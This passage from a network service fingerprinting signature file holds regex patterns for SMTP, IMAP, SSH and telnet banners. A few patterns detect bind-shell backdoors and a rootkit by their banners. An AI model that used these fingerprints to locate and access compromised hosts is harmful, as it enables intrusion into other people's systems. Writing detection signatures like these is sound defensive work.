\"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n +SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> +t\x03\0\0 +\x01remshd: Kerberos Authentication not enabled\.\n +\x01remshd: Error! Kerberos authentication failed +(?:ba)?sh-\d\.\d\d\w?# +:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n +GENERAL: \d+ \d+\n +220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n +220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n +220 ([-/.+\w]+) MailGate ready for ESMTP on +220 ([-/.+\w]+) SMTP ready to roll\r\n +220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n +220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n +554-([-.+\w]+)\.us\r\n554 Access denied\r\n +220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at +220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n +554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; +220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd +520 Connection not authorised from this address\.\r\n +554 SMTP service not available\r\n +220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready +421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 +220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n +220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n +220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n +220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n +220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n +421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n +220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready +220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at +220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n +220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready +220 \+OK Microsoft Exchange SMTP server version ([\d.]+) +220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim +220 CheckPoint FireWall-1 secure ESMTP server\r\n +220 CheckPoint FireWall-1 secure SMTP server\r\n +220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd +220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at +530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at +220 ([-.+\w]+) SMTP/smap Ready\.\r\n +220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at +220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n +220(\S+) WebShielde(\w+)/SMTP Ready. +220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n +220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) +220 [\*\d\ ]{2,300}\r\n +220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-.\w]+) ESMTP Service. Welcome.\r\n +220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n +220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready +220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at +220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready +220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n +220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n +220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); +220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n +220 YSmtp(\S+) ESMTP service ready +220 (\S+) ESMTP WEB.DE V([^\s\;]+) +220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP +220 Welcome to Nemesis ESMTP server on \S+ +220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) +220 (\S+) ESMTP XWall v(\d\S+) +220 (\S+) eMail Sentinel (\d+) ESMTP Service ready +220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n +220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) +220[- ][^ ]+ Smail-([^ ]+) +220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n +220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n +220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n +220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n +220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n +220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n +220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) +220 ([-\w_.]+) ESMTP postfix NO UCE\r\n +220 ([-\w_.]+) SMTPD Server - Postfix\r\n +220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n +220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n +220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n +220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n +220 ESMTP Lyris service ready\r\n +220 ESMTP Lyris ListManager service ready\r\n +220 ([-\w_.]+) SMTP Ready 12\.\r\n +220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n +220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n +220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n +220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n +220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready +220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n +220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); +421 Sorry, SMTP server too busy right now \(193\); try again later\r\n +220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n +220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] +220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n +220 ([-\w_.]+) mailfront ESMTP\r\n +220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n +220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n +220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n +220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n +220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n +220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n +500 Permission denied - closing connection\.\r\n +220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n +220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n +220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n +220 LiteMail SMTP Server Ready\.\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow\) ready +220 network-box ESMTP\r\n +220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +220 ([-\w_.]+) AntiVir MailGate\r\n +220 server ESMTP KEN! v([\d.]+); .*\r\n +220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n +220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 +220 shttp\.srv Simple Mail Transfer Service Ready\r\n +501 Domain must resolve\r\n +220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n +220 mailmatrix SMTP Server \(Mail Matrix Server\) ready +220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); +220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n +220 ([-\w_.]+); .* \+\d+\r\n +421 unable to read controls \(#4\.3\.0\)\r\n +554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n +rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n +220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n +220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), +220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail +220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready +220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n +220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n +220 DP-3510\r\n +220 ([-\w_.]+) Axigen ESMTP ready\r\n +421 Unexpected log failure, please try later\r\n +220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( +220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ +554 ([-\w_.]+) ESMTP not accepting messages\r\n +220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready +220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n +220 ShareMailPro SMTP Server Ready \r\n +220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready +220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n +220 Service ready KM([\w._-]+) smtpd\r\n +220 ([\w_.-]+) cqgreylist - minimal smptd\r\n +220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); +220 DP-1820E\r\n +220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n +220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) +220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n +220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n +220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready +421 Service not available, closing transmission channel\r\n +421 Service not available, closing transmission channel \r\n +220 ([\w_.-]+) ESMTP OpenSMTPD\r\n +220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n +220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n +220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n +220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n +220 ([\w._-]+) running IBM VM SMTP Level (\d+) on +421 4\.3\.2 Service not available\r\n +220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n +220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n +220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n +220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n +220 ESMTP smtprelay service ready\.\r\n +220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n +220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n +421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n +220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n +220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n +554 ([\d.]+) ([-\w_.]+) No mail service\r\n +220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n +220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n +220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( +220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n +NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n +220 ([-\w_.]+) ESMTP bitdefender +220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n +220 [-\w_.]+ avast! SMTP proxy ready\.\r\n +220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n +554 You are not allowed to connect\.\r\n +220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n +220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n +220 ([\w._-]+)\.ARK Sendmail ready\. \r\n +421 too many connections\r\n +220 ([-\w_.]+) ESMTP Service ready\r\n +220 ([\w._-]+) AVKSMTP Server\r\n +220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) +220[\s-].*?E?SMTP[^\r]*\r\n +550 (\d.\d.\d) ([^\r\n]+) +Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n +220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n +220 QuickPage v(\d[-.\w]+) SNPP server ready at +250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n +SPMD_ACK\0\0\x01\0\x01 +SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n +SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n +SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n +SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n +SSH-([\d.]+)-SSH Compatible Server\r?\n +SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n +SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell +sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- +sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n +SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) +SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n +SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n +SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n +SSH-([\d.]+)-Nortel\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n +\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v +SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n +SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 +SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 +SSH-([\d.]+)-Sun_SSH_(\S+) +SSH-([\d.]+)-meow roototkt by rebel +SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n +SSH-(\d[\d.]*)-(Server-V)\r?\n +SSH-(\d[\d.]*)-(Server-VI)\r?\n +SSH-(\d[\d.]*)-(Server-VII)\r?\n +SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n +\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n +SSH-2\.0-0\.0 \r?\n +SSH-([\d.]+)-([\w.]+) VShell\r?\n +SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n +SSH-1\.5-X\r?\n +Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n +SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-cryptlib\r?\n +SSH-2\.0-1\.0 Radware SSH \r?\n +SSH-2\.0-(\d{8,12})\r?\n +SSH-2\.0-Twisted\r?\n +SSH-2\.0-PGP\r?\n +SSH-([\d.]+)-libssh-([-\w.]+)\r?\n +SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n +SSH-([\d.]+)-VRP-([\d.]+)\r?\n +SSH-([\d.]+)-lancom\r?\n +SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd +SSH-([\d.]+)-AOS_SSH\r?\n +SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n +SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n +SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n +SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n +SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd +SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n +SSH-([\d.]+)-([\w.]+)rad\r?\n +SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n +SSH-1\.5-SSH\.0\.1\r?\n +SSH-([\d.]+)-Ingrian_SSH\r?\n +SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n +SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n +SSH-([\d.]+)-Zyxel SSH server\r?\n +SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n +SSH-2\.0-SSH_0\.2\r?\n +SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n +SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n +Could not load host key\. Closing connection\.\.\. +SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n +SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n +SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! +SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n +SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n +SSH-([\d.]+)-1\.00\r\n +SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n +SSH-([\d.]+)-ROSSSH\r\n +SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n +SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n +SSH-([\d.]+)-XXXX\r\n +SSH-([\d.]+)-xxx\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n +SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n +SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n +SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n +Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n +unknown command \r\nunknown command \r\n +\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n +RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n +\0\0\0\x0bSynergy\0\x01\0 +\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n +You are not welcome to use (\w+) from [\w._-]+\.\n +welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f +\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: +\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> +\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: +\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: +220 SL4NT viewer service ready\r\n250 Currently connected channels: +\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ +\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n +\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: +\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r +\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: +login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\r\npassword: +\xff\xfb\x01\xff\xfd\x18\xff\xfd# +\xff\xfb\x03\xff\xfb\x01\r\nPassword: +\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n +Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: +\xff\xfb\x01\xff\xfb\x03\r\nUsername: +\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 +\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n +\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: +\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP +\xff\xfe%\xff\xfd\x18 +\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +\r\nRaptor Firewall Secure Gateway\.\r\n +\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b +\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H +\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r +Check Point FireWall-1 authenticated Telnet server running on +\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> +\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link 